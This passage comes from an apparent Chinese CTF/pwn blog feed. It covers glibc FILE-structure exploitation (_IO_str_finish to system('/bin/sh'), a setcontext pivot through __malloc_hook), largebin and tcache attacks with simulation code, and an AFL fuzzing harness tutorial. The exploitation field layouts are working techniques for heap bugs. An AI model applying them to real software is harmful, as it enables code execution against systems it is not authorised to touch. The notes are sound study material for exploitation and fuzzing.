class="hljs-literal">void</span><br>_IO_str_finish (_IO_FILE *fp, int dummy)<br>{<br> <span class="hljs-keyword">if</span> (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))<br> <span class="hljs-function"><span class="hljs-params">(((_IO_strfile *) 
fp)->_s._free_buffer)</span> <span class="hljs-params">(fp->_IO_buf_base)</span>;</span><br><span class="hljs-function"> <span class="hljs-title">fp</span>-></span>_IO_buf_base = NULL;<br> ……<br>}<br></code></pre></td></tr></table></figure><p>这个利用更加简单,不过注意给<code>_IO_str_jumps</code>加上偏移, <code>_s._free_buffer</code>同样在fp+0xe8偏移处</p><p>其利用条件更简单,只需要</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_mode = <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_<span class="hljs-function"><span class="hljs-title">write_ptr</span> > fp-></span>_IO_write_base<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_read_ptr = <span class="hljs-number">0</span>x61 , smallbin4 + <span class="hljs-number">8</span> (smallbin size)<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_<span class="hljs-function"><span class="hljs-title">read_base</span> = _IO_list_all -0x10 , smallbin -></span> bk, unsorted bin attack <br>(以上为绕过_IO_flush_all_lockp的条件)<br>vtable = _IO_str_jumps - <span class="hljs-number">8</span> (这样调用_IO_overflow时会调用到 _IO_str_finish)<br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_flags= <span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">fp</span>-></span>_IO_buf_base = binsh_addr<br>fp+<span class="hljs-number">0</span>xe8 = system_addr<br></code></pre></td></tr></table></figure><h2 id="2-28限制任意函数执行"><a href="#2-28限制任意函数执行" class="headerlink" 
title="2.28 restricts arbitrary function execution"></a>2.28 restricts arbitrary function execution</h2><p>On top of the vtable address check introduced in 2.24, glibc 2.28 changed the code that could previously be abused for arbitrary function calls: the indirect calls through function pointers stored in the FILE object were replaced with direct calls to malloc and free.</p><p>For example, <code>_IO_str_overflow</code> from <code>_IO_str_jumps</code> looks like this in 2.28:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs c">int<br>_IO_str_overflow (FILE *fp, int c)<br>{<br>  …………<br>  if (pos >= (size_t) (_IO_blen (fp) + flush_only))<br>    {<br>      if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */<br>        return EOF;<br>      else<br>        {<br>          char *new_buf;<br>          char *old_buf = fp->_IO_buf_base;<br>          size_t old_blen = _IO_blen (fp);<br>          size_t new_size = 2 * old_blen + 100;<br>          if (new_size < old_blen)<br>            return EOF;<br>          new_buf = malloc (new_size);<br>          // before 2.28: new_buf = (char *) (*((_IO_strfile *) fp)->_s._allocate_buffer) (new_size);<br>          …………<br>          fp->_IO_write_base = new_buf;<br>          …………<br>        }<br>    }<br>  …………<br>  return c;<br>}<br></code></pre></td></tr></table></figure>
<p>And <code>_IO_str_finish</code> in 2.28:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c">void<br>_IO_str_finish (FILE *fp, int dummy)<br>{<br>  if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))<br>    free (fp->_IO_buf_base);<br>    // before 2.28: (((_IO_strfile *) fp)->_s._free_buffer) (fp->_IO_buf_base)<br>  fp->_IO_buf_base = NULL;<br><br>  _IO_default_finish (fp, 0);<br>}<br></code></pre></td></tr></table></figure>
<p>The conditions needed to reach these paths are unchanged, but what the attacker controls is now only the arguments passed to malloc and free. This still allows a chunk of an unexpected size to be requested, and the returned pointer is stored in <code>_IO_write_base</code>, i.e. at offset 0x20 of the FILE structure.</p><h2 id="2-29后新利用形式"><a href="#2-29后新利用形式" class="headerlink" title="New exploitation form from 2.29 on"></a>New exploitation form from 2.29 on</h2><p>Combined with the change to <code>setcontext</code> in glibc 2.29, the assembly of <code>_IO_str_overflow</code> offers an interesting new primitive:</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">0x7ffff7e6eb4f <__GI__IO_str_overflow+47>:  je   0x7ffff7e6ec80 <__GI__IO_str_overflow+352><br>0x7ffff7e6eb55 <__GI__IO_str_overflow+53>:  mov  rdx,QWORD PTR [rdi+0x28]   <----<br>0x7ffff7e6eb59 <__GI__IO_str_overflow+57>:  mov  r14,QWORD PTR [rbx+0x38]<br>0x7ffff7e6eb5d <__GI__IO_str_overflow+61>:  mov  r12,QWORD PTR [rbx+0x40]<br></code></pre></td></tr></table></figure>
<p>Right before malloc is called, one instruction loads <code>[rdi+0x28]</code> into rdx. At that point rdi points to the start of the <code>_IO_FILE_plus</code> object, so rdx receives the value of <code>_IO_write_ptr</code>.</p><p>From glibc 2.29 on, the register-restoring body of <code>setcontext</code> reads its <code>ucontext</code> from rdx instead of rdi, so this field lets the attacker drive setcontext on the newer versions and achieve an SROP-style register takeover.</p><p>The steps are:</p><ol><li>Overwrite <code>__malloc_hook</code> with the address of <code>setcontext</code>, specifically the part that loads registers from rdx: the prologue pushes rdi and later pops it back into rdx, so jumping to the very first instruction would replace the controlled rdx with the FILE pointer.</li><li>On entering <code>_IO_str_overflow</code>, rdx is loaded with the address of the prepared context. With <code>_IO_write_base</code> left as 0 this simultaneously satisfies <code>fp->_IO_write_ptr - fp->_IO_write_base >= _IO_buf_end - _IO_buf_base</code>, so the enlarge path is taken.</li><li>The call to malloc fires the hook, setcontext loads the context, and rsp, rip and the argument registers are under the attacker's control.</li></ol><p>One caveat when building the context: setcontext also executes <code>fldenv</code> on the pointer stored in the <code>fpregs</code> field (offset 0xe0 of the ucontext on x86_64), so that field must point to readable memory, otherwise the process faults before reaching the controlled rip.</p><p>Up to 2.31 the IO_FILE-related code saw no further changes that matter for these techniques, so they are not repeated here.</p>]]></content>
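<![CDATA[
Added example, not code from the original post: a user-space model of the 2.28+ enlarge path of _IO_str_overflow, run against a forged FILE. struct fake_file mirrors only the leading fields of glibc's struct _IO_FILE on x86_64 so that offsetof() yields the 0x20 and 0x28 offsets the post relies on; it is not glibc, the real function is never called, and the context address (0x601000) and the requested size (0x420) are assumptions chosen for the demo. It shows which fields have to be set for malloc to be reached with an attacker-chosen size while rdx holds _IO_write_ptr, and that _IO_USER_BUF shuts the path.

```c
/* Added example, not code from the original post: a user-space model of the
 * glibc 2.28+ _IO_str_overflow enlarge path, run against a forged FILE.
 * struct fake_file mirrors only the leading fields of glibc's struct _IO_FILE
 * on x86_64 so that offsetof() yields the offsets the post relies on; it is
 * not glibc and the real function is never called. The context address and
 * requested size below are assumptions chosen for the demo. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IO_USER_BUF 0x0001      /* _IO_USER_BUF: buffer is user-owned, not enlargeable */
#define EOF_VALUE   (-1)

/* Leading fields of struct _IO_FILE (x86_64), in glibc order. */
struct fake_file {
    int   flags;                /* 0x00, padded to 8 */
    char *read_ptr;             /* 0x08 */
    char *read_end;             /* 0x10 */
    char *read_base;            /* 0x18 */
    char *write_base;           /* 0x20: where _IO_str_overflow stores new_buf */
    char *write_ptr;            /* 0x28: what the 2.29 assembly loads into rdx */
    char *write_end;            /* 0x30 */
    char *buf_base;             /* 0x38 */
    char *buf_end;              /* 0x40 */
};

struct overflow_result {
    int       calls_malloc;     /* 1 if the enlarge path reaches malloc(new_size) */
    size_t    new_size;         /* 2 * _IO_blen(fp) + 100, the attacker-derived request */
    uintptr_t rdx;              /* [rdi+0x28] == _IO_write_ptr, the future setcontext argument */
};

/* Walk the decision logic of _IO_str_overflow without calling malloc. */
struct overflow_result model_str_overflow(const struct fake_file *fp, int c)
{
    struct overflow_result r = { 0, 0, (uintptr_t)fp->write_ptr };
    size_t flush_only = (c == EOF_VALUE);
    size_t pos  = (uintptr_t)fp->write_ptr - (uintptr_t)fp->write_base;
    size_t blen = (uintptr_t)fp->buf_end   - (uintptr_t)fp->buf_base;   /* _IO_blen(fp) */

    if (pos < blen + flush_only)
        return r;                           /* buffer still has room: no enlargement */
    if (fp->flags & IO_USER_BUF)
        return r;                           /* EOF: not allowed to enlarge */
    size_t new_size = 2 * blen + 100;
    if (new_size < blen)
        return r;                           /* EOF: arithmetic overflow check */
    r.calls_malloc = 1;
    r.new_size = new_size;
    return r;
}

/* Forge the FILE so the enlarge path is taken with rdx == ctx and
 * malloc() is asked for exactly `want` bytes (want >= 100 and even). */
void forge_file(struct fake_file *fp, uintptr_t ctx, size_t want)
{
    memset(fp, 0, sizeof *fp);
    fp->write_base = NULL;                  /* pos = write_ptr - 0 = ctx, a large value */
    fp->write_ptr  = (char *)ctx;           /* becomes rdx before the call to malloc */
    fp->buf_base   = NULL;
    fp->buf_end    = (char *)((want - 100) / 2);   /* _IO_blen = (want - 100) / 2 */
}

size_t offset_write_base(void) { return offsetof(struct fake_file, write_base); }
size_t offset_write_ptr(void)  { return offsetof(struct fake_file, write_ptr); }

/* Returns 1 when a forged FILE with a hypothetical context at 0x601000 drives
 * malloc(0x420) with rdx == 0x601000 and the same FILE with _IO_USER_BUF set
 * is refused; 0 otherwise. */
int demo(void)
{
    struct fake_file f;
    forge_file(&f, 0x601000, 0x420);
    struct overflow_result r = model_str_overflow(&f, 'A');
    int ok = r.calls_malloc && r.new_size == 0x420 && r.rdx == 0x601000;

    f.flags |= IO_USER_BUF;                 /* same layout, but now the path is refused */
    ok = ok && !model_str_overflow(&f, 'A').calls_malloc;
    return ok;
}

int main(void)
{
    struct fake_file f;
    forge_file(&f, 0x601000, 0x420);
    struct overflow_result r = model_str_overflow(&f, 'A');
    printf("_IO_write_base at 0x%zx, _IO_write_ptr at 0x%zx\n",
           offset_write_base(), offset_write_ptr());
    printf("malloc called: %d, size 0x%zx, rdx 0x%lx\n",
           r.calls_malloc, r.new_size, (unsigned long)r.rdx);
    return demo() ? 0 : 1;
}
```

The requested size is fully determined by _IO_buf_end - _IO_buf_base, which is why the post says the attacker now only controls malloc's argument; the context pointer rides in _IO_write_ptr and never has to satisfy anything other than being larger than that buffer length.
]]>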
<tags>
<tag>pwn</tag>
</tags>
</entry>
<entry>
<title>堆学习整理(二)</title>
<link href="/2022/03/14/%E5%A0%86%E5%AD%A6%E4%B9%A0%E6%95%B4%E7%90%86%EF%BC%88%E4%BA%8C%EF%BC%89/"/>
<url>/2022/03/14/%E5%A0%86%E5%AD%A6%E4%B9%A0%E6%95%B4%E7%90%86%EF%BC%88%E4%BA%8C%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="Largebin"><a href="#Largebin" class="headerlink" title="Largebin"></a>Largebin</h2><ol><li><p>Largebin is handled by the last branch of the size dispatch in <code>_int_malloc</code>: requests above the smallbin range (32-bit: size >= 0x200, 64-bit: size >= 0x400)</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs cpp">if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())){……}<br>if (in_smallbin_range (nb)){……}<br>else // largebin handling<br>  {<br>    ……<br>  }<br></code></pre></td></tr></table></figure></li><li><p>Each chunk carries four pointers, fd, bk, fd_nextsize and bk_nextsize, forming a <strong>doubly linked list</strong></p><ul><li>fd_nextsize points to the next chunk (in fd direction) whose size differs from the current one, i.e. the first chunk of the next smaller size</li><li>bk_nextsize points to the previous chunk whose size differs, i.e. the first chunk of the next larger size</li><li>Free large chunks are kept sorted: following fd from the bin header, sizes run from largest to smallest</li></ul></li><li><p>A freed chunk of this size first lands in unsortedbin; on a later malloc, an unsorted chunk that is not an exact fit is sorted into its largebin</p></li><li><p>The insertion position is chosen as follows</p><ol><li><p>If size is smaller than the smallest chunk in the bin, append at the end of the list</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c">if ((unsigned long) (size) < (unsigned long) (bck->bk->size)) // smaller than the smallest chunk in the bin<br>  {<br>    fwd = bck;<br>    bck = bck->bk;<br><br>    victim->fd_nextsize = fwd->fd;<br>    victim->bk_nextsize = fwd->fd->bk_nextsize;<br>    fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;<br>  }<br></code></pre></td></tr></table></figure></li><li><p>Otherwise, walk fd_nextsize until a chunk of equal or smaller size is found; a victim of equal size is inserted right after the first chunk of that size (the "second position"), a larger victim is placed in front of the first smaller chunk</p></li></ol><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs c">  else // size greater than or equal to the smallest<br>    {<br>      assert ((fwd->size & NON_MAIN_ARENA) == 0);<br>      while ((unsigned long) size < fwd->size)<br>        {<br>          fwd = fwd->fd_nextsize;<br>          assert ((fwd->size & NON_MAIN_ARENA) == 0);<br>        }<br><br>      if ((unsigned long) size == (unsigned long) fwd->size)<br>        /* Always insert in the second position.  */<br>        fwd = fwd->fd;<br>      else<br>        {<br>          victim->fd_nextsize = fwd;<br>          victim->bk_nextsize = fwd->bk_nextsize;<br>          fwd->bk_nextsize = victim;<br>          victim->bk_nextsize->fd_nextsize = victim;<br>        }<br>      bck = fwd->bk;<br>    }<br>}<br></code></pre></td></tr></table></figure></li><li><p>After the position is chosen, the chunk is linked into the bin</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c">victim->bk = bck;<br>victim->fd = fwd;<br>fwd->bk = victim;<br>bck->fd = victim;<br></code></pre></td></tr></table></figure></li></ol><h2 id="Tcache"><a href="#Tcache" class="headerlink" title="Tcache"></a>Tcache</h2><p>(tcache has changed quite a bit since it appeared in 2.26; to be updated when time permits)</p><ol><li><p>On the first malloc, a chunk is allocated first to hold the <code>tcache_perthread_struct</code>.</p></li><li><p>Each tcache bin holds at most 7 chunks by default</p></li><li><p>Several places in malloc move chunks into tcache.</p><p>(1) When the requested size is a fastbin size and a free chunk is found in that fastbin, the remaining chunks on that fastbin list are moved into tcache.</p><p>(2) When the requested size is a smallbin size and a free chunk is found in that smallbin, the remaining chunks on that smallbin list are moved into tcache.</p><p>(3) While walking the unsorted bin, an exact-fit chunk is not returned immediately but first placed into tcache, and the loop continues.</p></li><li><p>At the start of free, once the basic checks on the chunk's alignment and size and on the neighbouring chunks have passed, the chunk is offered to tcache first.</p></li></ol><h2 id="Largebin-attack"><a href="#Largebin-attack" class="headerlink" title="Largebin attack"></a>Largebin attack</h2><p>Preconditions:</p><ol><li>The data of a chunk sitting in a largebin can be modified</li><li>The chunk coming from unsortedbin must be sorted into the same largebin, right behind the tampered chunk</li></ol><p>Method (using the <code>victim->bk_nextsize->fd_nextsize = victim</code> store from the insertion code above):</p><ol><li>Overwrite bk_nextsize of chunk1, which already sits in the largebin, with &target-0x20 (0x20 is the offset of fd_nextsize inside a chunk)</li><li>Sort a chunk2 of a neighbouring size into the same largebin; chunk2 must be <strong>smaller</strong> than chunk1, so that the "smaller than the smallest chunk" branch is taken and the address of chunk2 is written to target</li></ol><p>Uses:</p><ol><li>Overwrite <code>_IO_list_all</code> to point at a forged <code>_IO_FILE</code> structure for FSOP</li><li>Overwrite <code>global_max_fast</code></li></ol><h2 id="Tcache-attack"><a href="#Tcache-attack" class="headerlink" title="Tcache attack"></a>Tcache attack</h2><p>Many tcache tricks mirror the fastbin ones. Note that when tcache is present, the matching tcache bin has to be filled up before the other bins see any chunks, so fill it first and then carry on with the rest of the attack</p>]]></content>
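<![CDATA[
Added example, not code from the original post: the largebin insertion logic quoted above (the version before the 2.30 nextsize checks), re-implemented over user-space fake chunks so that both the sorted order of the bin and the largebin attack can be observed without a live allocator. The chunk sizes, the bin header and the target word are constructed for the demo; storage[4] stands in for a word such as global_max_fast.

```c
/* Added example, not code from the original post: the largebin insertion
 * logic quoted above (glibc before the 2.30 nextsize checks), re-implemented
 * over user-space fake chunks. It shows the descending order of the bin and
 * how a corrupted bk_nextsize turns the `victim->bk_nextsize->fd_nextsize =
 * victim` store into a write of the victim's address to an arbitrary target.
 * Nothing here touches the real allocator; sizes and the target word are
 * constructed for the demo. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct malloc_chunk {
    size_t prev_size;
    size_t size;
    struct malloc_chunk *fd;
    struct malloc_chunk *bk;
    struct malloc_chunk *fd_nextsize;   /* offset 0x20 on x86_64 */
    struct malloc_chunk *bk_nextsize;   /* offset 0x28 */
};
typedef struct malloc_chunk *mchunkptr;

#define SIZE_BITS 7
static size_t chunksize(const struct malloc_chunk *p) { return p->size & ~(size_t)SIZE_BITS; }

/* A bin header: in glibc it is a pair of pointers inside main_arena; fd/bk of
 * the header are what the insertion code starts from as fwd/bck. */
static void bin_init(mchunkptr bin)
{
    bin->fd = bin->bk = bin;
    bin->fd_nextsize = bin->bk_nextsize = NULL;
}

/* Sort `victim` into `bin`, following the quoted _int_malloc code step by step. */
static void largebin_insert(mchunkptr bin, mchunkptr victim)
{
    size_t size = chunksize(victim);
    mchunkptr bck = bin;
    mchunkptr fwd = bck->fd;

    if (fwd != bck) {                               /* bin is not empty */
        if (size < chunksize(bck->bk)) {            /* smaller than the smallest: go last */
            fwd = bck;
            bck = bck->bk;
            victim->fd_nextsize = fwd->fd;
            victim->bk_nextsize = fwd->fd->bk_nextsize;
            fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
        } else {
            while (size < chunksize(fwd))           /* skip larger size classes */
                fwd = fwd->fd_nextsize;
            if (size == chunksize(fwd))
                fwd = fwd->fd;                      /* always insert in the second position */
            else {
                victim->fd_nextsize = fwd;
                victim->bk_nextsize = fwd->bk_nextsize;
                fwd->bk_nextsize = victim;
                victim->bk_nextsize->fd_nextsize = victim;
            }
            bck = fwd->bk;
        }
    } else {
        victim->fd_nextsize = victim->bk_nextsize = victim;
    }
    victim->bk = bck;                               /* final link-in, as in the post */
    victim->fd = fwd;
    fwd->bk = victim;
    bck->fd = victim;
}

/* Insert three sizes in arbitrary order and return 1 if walking fd from the
 * header yields them largest first, as the post states. */
int order_demo(void)
{
    struct malloc_chunk bin, a = {0}, b = {0}, c = {0};
    bin_init(&bin);
    a.size = 0x420; b.size = 0x440; c.size = 0x430;
    largebin_insert(&bin, &a);
    largebin_insert(&bin, &b);
    largebin_insert(&bin, &c);
    return chunksize(bin.fd) == 0x440 && chunksize(bin.fd->fd) == 0x430
        && chunksize(bin.fd->fd->fd) == 0x420 && bin.fd->fd->fd->fd == &bin;
}

/* Largebin attack: chunk1 sits in the bin, its bk_nextsize is overwritten with
 * target-0x20, then a smaller chunk2 is sorted in. Returns 1 if the target
 * word now holds chunk2's address. storage[4] stands in for the target (e.g.
 * global_max_fast); storage[0..3] only exist so that the fake chunk pointer
 * stays inside a real object. */
int largebin_attack_demo(void)
{
    struct malloc_chunk bin, chunk1 = {0}, chunk2 = {0};
    mchunkptr storage[8] = {0};
    mchunkptr *target = &storage[4];

    bin_init(&bin);
    chunk1.size = 0x430;
    largebin_insert(&bin, &chunk1);

    /* the one write the attacker needs: bk_nextsize = &target - 0x20 */
    chunk1.bk_nextsize = (mchunkptr)((char *)target - offsetof(struct malloc_chunk, fd_nextsize));

    chunk2.size = 0x420;                            /* smaller than chunk1: first branch */
    largebin_insert(&bin, &chunk2);

    return *target == &chunk2;
}

int main(void)
{
    printf("bin sorted largest first: %d\n", order_demo());
    printf("largebin attack wrote chunk2 to target: %d\n", largebin_attack_demo());
    return 0;
}
```

The attack only needs one store into the freed chunk1; the value that lands at target is the address of chunk2, which is why the post lists global_max_fast and _IO_list_all as targets: both just need to become "some large heap address".
]]>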
<tags>
<tag>pwn</tag>
</tags>
</entry>
<entry>
<title>从AFL开始fuzzing</title>
<link href="/2022/01/20/%E4%BB%8EAFL%E5%BC%80%E5%A7%8Bfuzzing/"/>
<url>/2022/01/20/%E4%BB%8EAFL%E5%BC%80%E5%A7%8Bfuzzing/</url>
<content type="html"><![CDATA[<h2 id="关于Fuzzing"><a href="#关于Fuzzing" class="headerlink" title="About fuzzing"></a>About fuzzing</h2><p>Fuzzing differs from traditional vulnerability discovery methods such as static analysis, dynamic analysis and code audit mainly in that it generates test inputs at scale, randomly or semi-randomly, with the goal of crashing the program. The approach has proven very effective: it reliably surfaces common bugs such as stack and heap overflows, and with assertions added it can also find problems that are not memory-safety bugs (for example CVE-2014-3570 in OpenSSL).</p><p>Fuzzing also has its limits</p><ul><li>It is hard to decide when to stop</li><li>Setting up the target and the input sources is entirely your job</li><li>It can get stuck on a check over the input data that the mutations cannot pass</li><li>Only certain classes of bugs can be found by a fuzzer</li></ul><p>Still, fuzzing is a powerful testing technique, so let us start with the well-known AFL (<a href="http://lcamtuf.coredump.cx/afl/">American fuzzy lop</a>).</p><h2 id="quickstart"><a href="#quickstart" class="headerlink" title="quickstart"></a>quickstart</h2><p>The sources used here all come from afl-training <a href="https://github.com/mykter/afl-training/tree/main">https://github.com/mykter/afl-training/tree/main</a></p><p>Two commands are enough to get a taste of afl</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"># when fuzzing from source, build the target with afl's wrapper for gcc/g++ (or clang) so that afl can instrument it<br>CC=afl-clang-fast AFL_HARDEN=1 make<br>afl-fuzz -i inputs -o out ./vulnerable<br></code></pre></td></tr></table></figure><p><img src="/image-20220119125948344.png"></p><p>If afl prints this notice, just do what it says</p><p>Run it as a non-root user so that the output files do not end up with permission problems. After it has run for a while, look at the results in the crashes directory under out; cat works, or open them in vim if the raw bytes are hard to read. To reproduce a crash, just feed the file back to the program</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./vulnerable < out/default/crashes/[file]<br></code></pre></td></tr></table></figure><p>The overview below summarises how afl's basic loop works</p><p><img src="/image-20220119170921897.png"></p><h2 id="harness"><a href="#harness" class="headerlink" title="harness"></a>harness</h2><p>The above is the basic afl workflow. A real program has several features, and a harness is needed to fuzz a specific one</p><ol><li><p>Write a harness (this appl when the source of the program is available)</p><p>Basic requirements for a harness:</p><ul><li><p>It runs</p></li><li><p>It feeds the input to the code under test effectively</p><p>There are two ways to get the input in. The first is stdin</p><p>The harness reads from stdin and passes the data to the location in the original code that should be tested</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c">// buffer-style input<br>ssize_t length;<br>char input[SIZE] = {0};<br>length = read(STDIN_FILENO, input, SIZE); // STDIN_FILENO is the source, input the destination, SIZE a constant you define<br><br>// integer input<br>int a = 0;<br>read(STDIN_FILENO, &a, 4); // take an integer straight out of the input stream<br></code></pre></td></tr></table></figure><p>The other way is file input</p><p>This takes three steps:</p><ol><li>Read the file path from the command line</li><li>Open the file and read it into a buffer</li><li>Pass the contents to the code block under test</li></ol><p>The input does not need any special adaptation to the type of data expected; afl's mutation strategies will generate plausible data on their own</p></li><li><p>It exits on its own when it is done</p></li><li><p>Crashes that are not the target are turned into error returns instead of crashes</p></li><li><p>Checks on the input data that the program performs (checksums and the like) are skipped, otherwise afl spends a lot of time generating data that passes them</p></li></ul></li><li><p>Compile the original code together with the harness</p><p>harness</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs cpp">#include <unistd.h><br>#include <string.h><br>#include <stdio.h><br><br>#include "library.h"<br><br>// Pick a maximum input size that covers what the code under test needs<br>#define SIZE 100<br><br>int main(int argc, char* argv[]) {<br>	if((argc == 2) && strcmp(argv[1], "echo") == 0) {<br>		// Select the feature to fuzz; the contents do not matter, only the length has to be right<br>		char input[SIZE] = {0};<br><br>		ssize_t length;<br>		length = read(STDIN_FILENO, input, SIZE);<br>		if (length < 0)<br>			return 1;            // read error: report it, do not crash<br><br>		lib_echo(input, length);<br>	} else if ((argc == 2) && strcmp(argv[1], "mul") == 0) {<br>		int a = 0, b = 0;<br>		read(STDIN_FILENO, &a, 4);<br>		read(STDIN_FILENO, &b, 4);<br>		printf("%d\n", lib_mul(a,b));<br>	} else {<br>		printf("Usage: %s mul|echo\n", argv[0]);<br>	}<br>	return 0;<br>}<br></code></pre></td></tr></table></figure><p>Compile:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">AFL_HARDEN=1 afl-clang-fast harness.c original.c -o test_program<br># use one of afl-clang-fast, afl-clang, or afl-gcc<br></code></pre></td></tr></table></figure></li><li><p>Start fuzzing</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">afl-fuzz -i input_dir -o output_dir ./test_program<br></code></pre></td></tr></table></figure><p>The if on <code>(argc == 2) && strcmp(argv[1], "mul") == 0</code> decides which part gets fuzzed: put the handling of each feature inside its own branch and pick the feature at run time.<br>The harness is then started as <code>afl-fuzz -i in -o out ./harness echo</code></p></li></ol><p>A short run is enough to get results: the program is very simple, and an input of pop! terminates the process.</p><p><img src="/image-20220116164828196.png"></p>]]></content>
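<![CDATA[
Added example, not code from afl-training or the original post: a harness skeleton that covers the file-input variant the post describes in three steps but does not show. It takes the input from a file named on the command line (afl's @@ convention) or from stdin otherwise, reads it completely with a retry loop, and hands it to parse_records(), a hypothetical stand-in for the library function under test that walks a small length-prefixed record format and reports malformed input through its return value rather than by crashing, as the post recommends for errors that are not the target. MAX_INPUT, the record format and the self-check bytes are assumptions for the demo.

```c
/* Added example, not code from afl-training or the original post: a harness
 * skeleton that takes its input either from stdin or from a file named on
 * the command line (afl's @@ convention), reads it fully with a retry loop,
 * and hands it to a tiny hypothetical target. parse_records() is a stand-in
 * for the library function under test: it walks a length-prefixed record
 * format and reports malformed input through its return value instead of
 * crashing, which is what the post recommends for non-target errors. */
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAX_INPUT 4096              /* assumed upper bound the target can handle */

/* Read up to `cap` bytes from fd, retrying on short reads and EINTR.
 * Returns the number of bytes read, or -1 on a read error. */
ssize_t read_all(int fd, unsigned char *buf, size_t cap)
{
    size_t total = 0;
    while (total < cap) {
        ssize_t n = read(fd, buf + total, cap - total);
        if (n == 0) break;                          /* EOF */
        if (n < 0) {
            if (errno == EINTR) continue;
            return -1;
        }
        total += (size_t)n;
    }
    return (ssize_t)total;
}

/* Hypothetical target: records are [u8 tag][u8 len][len bytes]. Returns the
 * number of complete records, or -1 if a record claims more bytes than
 * remain. Every length taken from the input is checked against what is left
 * before it is used, so a bad file yields an error code, not a crash. */
int parse_records(const unsigned char *data, size_t len)
{
    int count = 0;
    size_t off = 0;
    while (off < len) {
        if (len - off < 2) return -1;               /* truncated header */
        size_t body = data[off + 1];
        if (len - off - 2 < body) return -1;        /* body runs past the input */
        off += 2 + body;
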